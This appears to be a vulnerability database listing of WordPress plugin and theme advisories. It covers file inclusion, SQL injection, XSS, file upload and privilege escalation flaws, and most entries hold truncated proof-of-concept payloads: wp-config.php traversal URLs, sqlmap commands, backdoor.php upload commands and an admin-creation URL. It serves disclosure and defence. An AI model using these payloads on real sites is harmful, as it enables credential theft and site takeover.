RobotCPA Plugin V5 - Unauthenticated Local File Inclusion
The robotcpa WordPress plugin was affected by an Unauthenticated Local File Inclusion security vulnerability. This issue has been seen exploited in the wild with the following payload: http://www.example.com/wp-content/plugins/robotcpa/f.php?l=..%2F..%2F..%2Fwp-config.php...
Easy2Map Photos <= 1.0.9 - SQL Injection
The code in Functions.php is vulnerable to SQL Injection because it does not parameterise or sanitise user input. sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2mimgsavemapname" --cookie=COOKIEHERE --level=5 --risk=3...
Easy2Map <= 1.24 - SQL Injection
The Function.php file uses sprintf to format queries sent to the database; this neither sanitises user input properly nor parameterises the query. $ sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php'...
SE HTML5 Album Audio Player <= 1.1.0 - Local File Include
The se-html5-album-audio-player v1.1.0 plugin for WordPress has a local file include vulnerability. The downloadaudio.php file does not check whether the user is authenticated; it only attempts to check that the path is inside /wp-content/uploads, which is easily defeated with ../...
Simple Share Buttons Adder <= 6.0.0 - Reflected Cross-Site Scripting (XSS)
"Simple Share Buttons Adder" before version 6.0.1 was affected by a reflected cross-site scripting vulnerability on all pages where the share buttons were added, usually all blog posts. Exploitation required that the browser did not encode the parameters sent to the server...
Anti-Malware & Brute-Force Security by ELI <= 4.15.22 - Stored XSS
The Anti-Malware and Brute-Force Security by ELI plugin has two issues, which we will cover in this report. The first is that no CSRF nonce token is used on the settings screen. This could potentially result in resource exhaustion by performing a large number of scans simultaneously, should an...
NextScripts: Social Networks Auto-Poster < 3.4.18 - CSRF to Stored XSS
The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to a Persistent XSS attack on the settings screen, due to a lack of sanitisation of user input and the absence of a Cross-Site Request Forgery nonce token. If a page with the following FORM is visited by an administrative...
Simple Photo Gallery 1.7.8 - Blind SQL Injection
MySQL >= 5.0.12 AND time-based blind SELECT SQL injection in the galleryid parameter. ./sqlmap.py --dbms=MYSQL --technique T -u http://www.example.com/wordpress/index.php/wppgphotogallery/wppgphotodetails/?galleryid=1&imageid=14...
My Calendar <= 2.3.29 - Arbitrary File Override & Reflected XSS
The file override vulnerability allows an admin to overwrite any file on the web server, ignoring settings such as DISALLOW_FILE_EDIT. Arbitrary File Override ----------------------- POST http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-styles Post Data: wpnonceavalidnonce...
Anti-Malware & Brute-Force Security by ELI <= 4.15.17 - Multiple Reflected XSS
The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by a Multiple Reflected XSS security vulnerability. http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLSmsg=xsstestalert1...
Visual Form Builder <= 2.8.2 - SQL Injection & Reflected XSS
The Visual Form Builder WordPress plugin was affected by a SQL Injection & Reflected XSS security vulnerability. SQL Injection ------------- http://www.example.com/wp-admin/admin.php?page=visual-form-builder&form-filter=1+or+1%3D2...
Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
The jQuery prettyPhoto library bundled with many plugins was found to be vulnerable to DOM Cross-Site Scripting XSS. http://www.example.com/prettyPhotogallery/1,/...
Syndication Links <= 1.0.2 - DOM Cross-Site Scripting (XSS)
The Syndication Links WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/syndication-links/genericons/example.html...
Indieweb Post Kinds <= 1.3.1 - DOM Cross-Site Scripting (XSS)
The Post Kinds WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/indieweb-post-kinds/genericons/example.html...
Media File Manager Advanced <= 1.1.5 - Multiple Vulnerabilities
Media File Manager Advanced allows any authenticated user to perform administrator actions due to weak permission checks. An attacker is able to delete/update posts, create/remove/list directories, move/rename/delete files, and perform blind SQL injection and cross-site scripting. Pos...
Auberge Theme <= 1.4.4 - DOM Cross-Site Scripting (XSS)
The Auberge WordPress theme was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/themes/auberge/genericons/example.html...
Modern Theme <= 1.4.1 - DOM Cross-Site Scripting (XSS)
The Modern WordPress theme was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/themes/modern/genericons/example.html...
WordPress 4.1-4.2.1 - Unauthenticated Genericons Cross-Site Scripting (XSS)
Description: WordPress 4.1.5 and 4.2.2 remove the Genericons example file that came bundled with the twentyfifteen theme, which is vulnerable to DOM-based Cross-Site Scripting (XSS). http://www.example.com/wp-content/themes/twentyfifteen/genericons/example.html1...
Yet Another Related Posts Plugin (YARPP) 4.2.4 - CSRF / XSS / RCE
'Yet Another Related Posts Plugin' options can be updated with no token/nonce protection, which an attacker may exploit by tricking the website's administrator into visiting a malformed page that changes YARPP options; since some options allow HTML, the attacker is able to inject malformed...
Amazon Product In a Post Plugin - SQL Injection
amazon-product-in-a-post.php - this plugin takes raw user values and uses them in a DELETE query against the database. This query can be manipulated to perform SQL injection attacks. Line 40: $tempswe = $wpdb->query("DELETE FROM $wpdb->prefixamazoncache WHERE Cacheid ='$wp_query->query_vars['appip-cache-id']' LIMIT 1;"); sqlm...
Freshmail for WordPress <= 1.5.8 - shortcode.php SQL Injection
There is a SQL Injection vulnerability exploitable by collaborators or higher-privileged users on sites with the Freshmail plugin installed. The SQL Injection is located in the "id" attribute of the inserted shortcode [FMform id="N"]. The shortcode attribute "id" is not sanitised before being inserted in ...
Jetpack <= 3.5.2 - Unauthenticated DOM Cross-Site Scripting (XSS)
Genericons...
Freshmail for WordPress <= 1.5.8 - Unauthenticated SQL Injection
There is an unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" forms shown to web visitors, in the POST parameter fmformid. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: X-Requested-With: XMLHttpRequest ... Cookie: wordpressf30...
Facebook Page Photo Gallery <= 2.0.9 - DOM Cross-Site Scripting (XSS)
The facebook-page-photo-gallery WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/prettyPhotormsg0d/2,/...
Twenty Fifteen Theme <= 1.1 - DOM Cross-Site Scripting (XSS)
Genericons...
WordPress prettyPhoto <= 1.1 - DOM Cross-Site Scripting (XSS)
The WordPress prettyPhoto WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/prettyPhotogallery/1,/...
Pie Register 2.0.14-2.0.15 - SQL Injection
User input is not validated correctly when accepting an Invitation Code, so an SQL Injection attack is possible. This attack is triggered when the parameters ‘showdashwidget’ and ‘invitaioncode’ are provided to any page, by any user, anonymous or otherwise. import requests,base64,re...
Pie Register 2.0.14-2.0.15 - Privilege Escalation
User input is not validated correctly when accepting a login request via the Pie Register plugin. It is possible to manipulate posted variables in order to log in using an arbitrary User ID, such as 1 for the default Administrative account. import requests target="http://localhost" payload =...
WeeklyNews Premium Theme <= 2.2 - Cross-Site Scripting (XSS)
Vendor confirmed fixed in 2.2.9, although this issue was not mentioned in the changelog. http://www.example.com/?s=test"...
White Label CMS <= 1.5.2 - Stored XSS
Due to a lack of CSRF protection and a lack of sanitisation of user input, it is possible to trigger a Persistent XSS attack via a CSRF attack. This attack targets in particular the Import functionality, which is located in the 'wlcmsImport' function, within the file...
rtMedia for WordPress, BuddyPress & bbPress 3.7.39 - SQL Injection
When initialized, the rtMedia plugin will include and instantiate certain classes if BuddyPress is installed. One of these classes is RTMediaActivityUpgrade, contained within the file ‘app/importers/RTMediaActivityUpgrade.php’. This class is instantiated in the file ‘admin/RTMediaAdmin.php’, line 110, i...
Exquisite Ultimate Newspaper Theme <= 1.3.3 - DOM Cross-Site Scripting (XSS)
The exquisite-wp WordPress theme was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/...
Premium SEO Pack 1.8.0 - Unauthenticated Arbitrary File Upload & LFD
This plugin is vulnerable to Local File Disclosure and Remote Code Execution via Arbitrary File Upload. BASE64 ENCODED SHELL...
Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection
Unauthenticated SQL injection in the "SingleProduct" parameter when a web visitor views a product published by the web administrator. This exploit requires magic_quotes_gpc to be turned off on the destination server. File Functions/Shortcodes.php line 779 http:///?SingleProduct=2'+and+'a'='a...
Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection
Unauthenticated SQL injection in the AJAX call used when the plugin counts how many times a product has been viewed by web visitors. The vulnerable POST parameter is "ItemID". Vulnerable code, in file Functions/ProcessAjax.php line 67: ... $ItemID = $_POST['ItemID']; $Item = $wpdb->get_row("SELECT ItemViews...
Ultimate Product Catalogue <= 3.1.1 - Unauthenticated File Upload
By sending a specially crafted HTTP POST request, a remote unauthenticated attacker can exploit this issue to upload an arbitrary file and execute it in the context of the web server process. curl -v -k -X POST -F "ProductsSpreadsheet=@./backdoor.php"...
Crayon Syntax Highlighter 2.0 - 2.6.10 - Defacement
The Crayon Syntax Highlighter plugin allows access to the AJAX method 'crayon-theme-editor-save' to any registered user. When called, the AJAX method ‘crayon-theme-editor-save’ will call the 'save' function within the CrayonThemeEditorWP class, defined in...
Mashshare <= 2.3.0 - Information Disclosure
The Mashshare plugin exposes a few AJAX commands via its own custom hook, which can be found in the file ‘includes/admin/admin-actions.php’, in the function ‘mashsb_process_actions’. This function is called when the ‘admin_init’ action fires, which can be triggered by anyone when visiting the...
WP-Mon - Arbitrary File Download
The wp-mon WordPress plugin was affected by an Arbitrary File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php...
Ajax Store Locator <= 1.2 - Remote SQL Injection
The ajax-store-locator WordPress plugin was affected by a Remote SQL Injection security vulnerability. http://www.example.com/wordpress/wp-admin/admin-ajax.php?action=sldalsearchlocation&funMethod=SearchStore&Location=Social&StoreLocation=11 AND SELECT FROM SELECTSLEEP10LCKZ...
Crayon Syntax Highlighter <= 2.6.10 - Local File Disclosure
The local file syntax highlighting feature of Crayon Syntax Highlighter doesn't check the path of the file to process. Also, by default, this feature is usable through public comments. This allows unauthenticated visitors to see the content of any file where the web server has read permissions,...
Tune Library <= 1.5.4 - SQL Injection
The Tune Library WordPress plugin was affected by a SQL Injection security vulnerability. http://www.example.com/?pageid=2&artistletter=G' UNION ALL SELECT CONCATWSCHAR59,version,currentuser,database,2--%20...
WP Mobile Edition <= 2.2.7 - Remote File Disclosure
The plugin does not filter the 'files' GET parameter in the file 'themes/mTheme-Unus/css/css.php': http://www.example.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php...
WordPress Video Gallery <= 2.8 - SQL Injection
Note: The vendor patched the issue but did not change the version number. "Fixed in version 2.8.1" is used for detection purposes, although in reality this version does not exist at the time of writing. http://www.example.com/wp-admin/admin-ajax.php?action=googleadsense&vid=SQLi...
N-Media Website Contact Form with File Upload <= 1.3.4 - Arbitrary File Upload
The "uploadfile" AJAX function is affected by an unrestricted file upload vulnerability. curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nmwebcontactuploadfile" http://www.example.com/wp-admin/admin-ajax.php Response:...
Fusion Engage 1.0.5 - Local File Disclosure
The fusion-engage WordPress plugin was affected by a Local File Disclosure security vulnerability. curl --data "action=fegetsvhtml&video=../wp-config.php" "http://www.example.com/wp-admin/admin-ajax.php";...
Duplicator <= 0.5.14 - SQL Injection & CSRF
An authorised user with "export" permission, or a remote unauthenticated attacker who entices an authenticated admin via CSRF, could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site. http://www.example.com/wp-admin/admin-ajax.php?action=duplicatorpackagedelete PO...
All In One WP Security & Firewall <= 3.9.0 - Blind SQL Injection
There are some pages which use the WordPress esc_sql function incorrectly. http://www.example.com/wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=userid,select from selectsleep30a&order=asc...
QAEngine Theme - Privilege Escalation
A QAEngine vulnerability allows an attacker to obtain an administrator account on the target's website. http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&userlogin=xADMIN&userpass=xPASS&role=administrator...
SP Project & Document Manager <= 2.5.3 - Blind SQL Injection
The SP Project & Document Manager WordPress plugin was affected by a Blind SQL Injection security vulnerability. http://www.example.com/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=SQLi...